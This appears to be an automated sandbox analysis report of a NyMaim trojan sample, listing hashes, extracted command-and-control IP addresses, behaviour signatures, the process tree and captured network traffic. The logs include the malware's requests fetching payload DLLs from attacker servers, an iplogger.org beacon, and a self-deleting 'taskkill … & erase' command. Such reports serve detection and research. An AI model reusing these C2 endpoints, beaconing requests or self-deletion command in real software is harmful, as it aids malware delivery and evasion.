nymaim | 4ccaf0fd0ebf9417aae0e341166b21f3429908e3710d1c745344c399893cb669

Analysis

max time kernel
103s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
24/09/2022, 13:42 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

284KB
MD5

5cd9388b0e60981c36bc0553a1ca540a
SHA1

3227b002a4f6b6e0b1962ca395133b1dc8c77e84
SHA256

4ccaf0fd0ebf9417aae0e341166b21f3429908e3710d1c745344c399893cb669
SHA512

7d820dc13a8d8ca8d4798038b1d94122615c5b5f413f9c5de41eb2692ed0a512a6266751d12e8084b20f06ccc7e44f374f471a746c20287a98218b3a357126cc
SSDEEP

3072:FJOaLxo02cb5wPpkxYlpkqYSegeCgdLQjNHg7RA+zVRCnWPaVZdiuhz82Dk+Exx1:fLd2VBl3HgNQjF+zV8WPG5Fw+qx32AY

Score

10^/10

nymaim trojan

Malware Config

Extracted

Family

nymaim

208.67.104.97

85.31.46.167

Signatures

NyMaim
NyMaim is a malware with various capabilities written in C++ and first seen in 2013.
trojan nymaim
Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
2312	Cleaner.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	file.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 11 IoCs

pid	pid_target	Process	procid_target
2976	4760	WerFault.exe	78
4820	4760	WerFault.exe	78
4692	4760	WerFault.exe	78
4160	4760	WerFault.exe	78
1884	4760	WerFault.exe	78
4880	4760	WerFault.exe	78
5108	4760	WerFault.exe	78
3196	4760	WerFault.exe	78
1664	4760	WerFault.exe	78
4200	4760	WerFault.exe	78
3264	4760	WerFault.exe	78

Kills process with taskkill 1 IoCs

evasion

pid	Process
1144	taskkill.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4760	file.exe
4760	file.exe
4760	file.exe
4760	file.exe
4760	file.exe
4760	file.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4760	file.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2312	Cleaner.exe
Token: SeDebugPrivilege	1144	taskkill.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 4760 wrote to memory of 3452	4760	file.exe	102
PID 4760 wrote to memory of 3452	4760	file.exe	102
PID 4760 wrote to memory of 3452	4760	file.exe	102
PID 3452 wrote to memory of 2312	3452	cmd.exe	104
PID 3452 wrote to memory of 2312	3452	cmd.exe	104
PID 4760 wrote to memory of 796	4760	file.exe	114
PID 4760 wrote to memory of 796	4760	file.exe	114
PID 4760 wrote to memory of 796	4760	file.exe	114
PID 796 wrote to memory of 1144	796	cmd.exe	116
PID 796 wrote to memory of 1144	796	cmd.exe	116
PID 796 wrote to memory of 1144	796	cmd.exe	116

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:4760
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 464
  2⤵
  - Program crash
  PID:2976
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 768
  2⤵
  - Program crash
  PID:4820
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 776
  2⤵
  - Program crash
  PID:4692
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 800
  2⤵
  - Program crash
  PID:4160
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 780
  2⤵
  - Program crash
  PID:1884
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 928
  2⤵
  - Program crash
  PID:4880
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 932
  2⤵
  - Program crash
  PID:5108
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 1376
  2⤵
  - Program crash
  PID:3196
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\YeHQt6G3YbVMYe\Cleaner.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3452
- - C:\Users\Admin\AppData\Local\Temp\YeHQt6G3YbVMYe\Cleaner.exe
    "C:\Users\Admin\AppData\Local\Temp\YeHQt6G3YbVMYe\Cleaner.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2312
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 1376
  2⤵
  - Program crash
  PID:1664
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 1648
  2⤵
  - Program crash
  PID:4200
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\file.exe" & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:796
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im "file.exe" /f
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1144
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 1360
  2⤵
  - Program crash
  PID:3264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 4760 -ip 4760
1⤵
PID:1688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 4760 -ip 4760
1⤵
PID:3932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4760 -ip 4760
1⤵
PID:4772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4760 -ip 4760
1⤵
PID:3760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 4760 -ip 4760
1⤵
PID:732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4760 -ip 4760
1⤵
PID:2384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4760 -ip 4760
1⤵
PID:616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4760 -ip 4760
1⤵
PID:2644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4760 -ip 4760
1⤵
PID:4036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4760 -ip 4760
1⤵
PID:4832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4760 -ip 4760
1⤵
PID:2672

Network

GET

http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte

file.exe

Remote address:

208.67.104.97:80

Request

GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 208.67.104.97
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 24 Sep 2022 13:42:21 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://85.31.46.167/software.php

file.exe

Remote address:

85.31.46.167:80

Request

GET /software.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: D
Host: 85.31.46.167
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 24 Sep 2022 13:42:22 GMT
Server: Apache/2.4.41 (Ubuntu)
Pragma: public
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="dll";
Content-Transfer-Encoding: binary
Content-Length: 242176
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
GET

http://85.31.46.167/software.php

file.exe

Remote address:

85.31.46.167:80

Request

GET /software.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: E
Host: 85.31.46.167
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 24 Sep 2022 13:42:22 GMT
Server: Apache/2.4.41 (Ubuntu)
Pragma: public
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="soft";
Content-Transfer-Encoding: binary
Content-Length: 4036976
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream
DNS

iplogger.org

Cleaner.exe

Remote address:

8.8.8.8:53

Request

iplogger.org

IN A

Response

iplogger.org

IN A

148.251.234.83
GET

https://iplogger.org/1Pz8p7

Cleaner.exe

Remote address:

148.251.234.83:443

Request

GET /1Pz8p7 HTTP/1.1
User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36
Host: iplogger.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 24 Sep 2022 13:42:27 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: clhf03028ja=154.61.71.50; expires=Sun, 24-Sep-2023 13:42:27 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
Set-Cookie: 333625792587707186=1; expires=Sun, 24-Sep-2023 13:42:27 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
Expires: Sat, 24 Sep 2022 13:42:27 +0000
Cache-Control: no-store, no-cache, must-revalidate
Strict-Transport-Security: max-age=31536000
X-Frame-Options: SAMEORIGIN
GET

http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte

file.exe

Remote address:

208.67.104.97:80

Request

GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 208.67.104.97
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 24 Sep 2022 13:43:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://107.182.129.235/storage/ping.php

file.exe

Remote address:

107.182.129.235:80

Request

GET /storage/ping.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 0
Host: 107.182.129.235
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 24 Sep 2022 13:43:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 17
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://107.182.129.235/storage/extension.php

file.exe

Remote address:

107.182.129.235:80

Request

GET /storage/extension.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 107.182.129.235
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 24 Sep 2022 13:43:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Pragma: public
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="fuckingdllENCR.dll";
Content-Transfer-Encoding: binary
Content-Length: 94224
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream
GET

http://171.22.30.106/library.php

file.exe

Remote address:

171.22.30.106:80

Request

GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 24 Sep 2022 13:43:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://171.22.30.106/library.php

file.exe

Remote address:

171.22.30.106:80

Request

GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 24 Sep 2022 13:43:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://171.22.30.106/library.php

file.exe

Remote address:

171.22.30.106:80

Request

GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 24 Sep 2022 13:43:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://171.22.30.106/library.php

file.exe

Remote address:

171.22.30.106:80

Request

GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 24 Sep 2022 13:43:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://171.22.30.106/library.php

file.exe

Remote address:

171.22.30.106:80

Request

GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 24 Sep 2022 13:43:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://171.22.30.106/library.php

file.exe

Remote address:

171.22.30.106:80

Request

GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 24 Sep 2022 13:43:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://171.22.30.106/library.php

file.exe

Remote address:

171.22.30.106:80

Request

GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 24 Sep 2022 13:43:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://171.22.30.106/library.php

file.exe

Remote address:

171.22.30.106:80

Request

GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 24 Sep 2022 13:43:43 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://171.22.30.106/library.php

file.exe

Remote address:

171.22.30.106:80

Request

GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 24 Sep 2022 13:43:46 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://171.22.30.106/library.php

file.exe

Remote address:

171.22.30.106:80

Request

GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 24 Sep 2022 13:43:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://171.22.30.106/library.php

file.exe

Remote address:

171.22.30.106:80

Request

GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 24 Sep 2022 13:43:51 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

208.67.104.97:80

http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte

http

file.exe

719 B
416 B
6
5

HTTP Request

GET http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte

HTTP Response

200
85.31.46.167:80

http://85.31.46.167/software.php

http

file.exe

153.8kB
4.4MB
3155
3153

HTTP Request

GET http://85.31.46.167/software.php

HTTP Response

200

HTTP Request

GET http://85.31.46.167/software.php

HTTP Response

200
148.251.234.83:443

https://iplogger.org/1Pz8p7

tls, http

Cleaner.exe

1.1kB
5.9kB
11
13

HTTP Request

GET https://iplogger.org/1Pz8p7

HTTP Response

200
52.182.141.63:443

322 B
7
93.184.221.240:80

322 B
7
93.184.221.240:80

322 B
7
208.67.104.97:80

http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte

http

file.exe

720 B
376 B
6
4

HTTP Request

GET http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte

HTTP Response

200
107.182.129.235:80

http://107.182.129.235/storage/extension.php

http

file.exe

4.3kB
97.9kB
77
75

HTTP Request

GET http://107.182.129.235/storage/ping.php

HTTP Response

200

HTTP Request

GET http://107.182.129.235/storage/extension.php

HTTP Response

200
171.22.30.106:80

http://171.22.30.106/library.php

http

file.exe

5.4kB
3.2kB
25
23

HTTP Request

GET http://171.22.30.106/library.php

HTTP Response

200

HTTP Request

GET http://171.22.30.106/library.php

HTTP Response

200

HTTP Request

GET http://171.22.30.106/library.php

HTTP Response

200

HTTP Request

GET http://171.22.30.106/library.php

HTTP Response

200

HTTP Request

GET http://171.22.30.106/library.php

HTTP Response

200

HTTP Request

GET http://171.22.30.106/library.php

HTTP Response

200

HTTP Request

GET http://171.22.30.106/library.php

HTTP Response

200

HTTP Request

GET http://171.22.30.106/library.php

HTTP Response

200

HTTP Request

GET http://171.22.30.106/library.php

HTTP Response

200

HTTP Request

GET http://171.22.30.106/library.php

HTTP Response

200

HTTP Request

GET http://171.22.30.106/library.php

HTTP Response

200

8.8.8.8:53

iplogger.org

dns

Cleaner.exe

58 B
74 B
1
1

DNS Request

iplogger.org

DNS Response

148.251.234.83

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\YeHQt6G3YbVMYe\Bunifu_UI_v1.5.3.dll

Filesize
236KB

MD5
2ecb51ab00c5f340380ecf849291dbcf

SHA1
1a4dffbce2a4ce65495ed79eab42a4da3b660931

SHA256
f1b3e0f2750a9103e46a6a4a34f1cf9d17779725f98042cc2475ec66484801cf

SHA512
e241a48eafcaf99187035f0870d24d74ae97fe84aaadd2591cceea9f64b8223d77cfb17a038a58eadd3b822c5201a6f7494f26eea6f77d95f77f6c668d088e6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\YeHQt6G3YbVMYe\Cleaner.exe

Filesize
3.8MB

MD5
23c1e8f48ec06960bbd9969c1f404192

SHA1
b9384151eb3f2dbd095fa273c248722e1cc74ea3

SHA256
301d9c55653f6cd8211aafdaf130092cb7ef8ea2e54db2db97153c1c8abf272c

SHA512
f572e3a0ad58b3a1ed22db00b05a3909f7f53f70b84ab736e2dd6ddc54d8781fcffe4a9b33b0dd2836d438a1982b944426fe4ed01bd866bd77e20046220f2b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\YeHQt6G3YbVMYe\Cleaner.exe

Filesize
3.8MB

MD5
23c1e8f48ec06960bbd9969c1f404192

SHA1
b9384151eb3f2dbd095fa273c248722e1cc74ea3

SHA256
301d9c55653f6cd8211aafdaf130092cb7ef8ea2e54db2db97153c1c8abf272c

SHA512
f572e3a0ad58b3a1ed22db00b05a3909f7f53f70b84ab736e2dd6ddc54d8781fcffe4a9b33b0dd2836d438a1982b944426fe4ed01bd866bd77e20046220f2b5b

Download Submit
memory/2312-144-0x00007FFB92040000-0x00007FFB92B01000-memory.dmp

Filesize
10.8MB

Download
memory/2312-141-0x0000026B01A70000-0x0000026B01BF0000-memory.dmp

Filesize
1.5MB

Download
memory/2312-143-0x0000026B037E0000-0x0000026B03822000-memory.dmp

Filesize
264KB

Download
memory/2312-145-0x00007FFB92040000-0x00007FFB92B01000-memory.dmp

Filesize
10.8MB

Download
memory/4760-137-0x0000000000400000-0x00000000005A1000-memory.dmp

Filesize
1.6MB

Download
memory/4760-136-0x0000000000609000-0x000000000062F000-memory.dmp

Filesize
152KB

Download
memory/4760-132-0x0000000000609000-0x000000000062F000-memory.dmp

Filesize
152KB

Download
memory/4760-146-0x0000000010000000-0x000000001001B000-memory.dmp

Filesize
108KB

Download
memory/4760-134-0x0000000000400000-0x00000000005A1000-memory.dmp

Filesize
1.6MB

Download
memory/4760-133-0x00000000021A0000-0x00000000021DF000-memory.dmp

Filesize
252KB

Download
memory/4760-152-0x0000000000400000-0x00000000005A1000-memory.dmp

Filesize
1.6MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.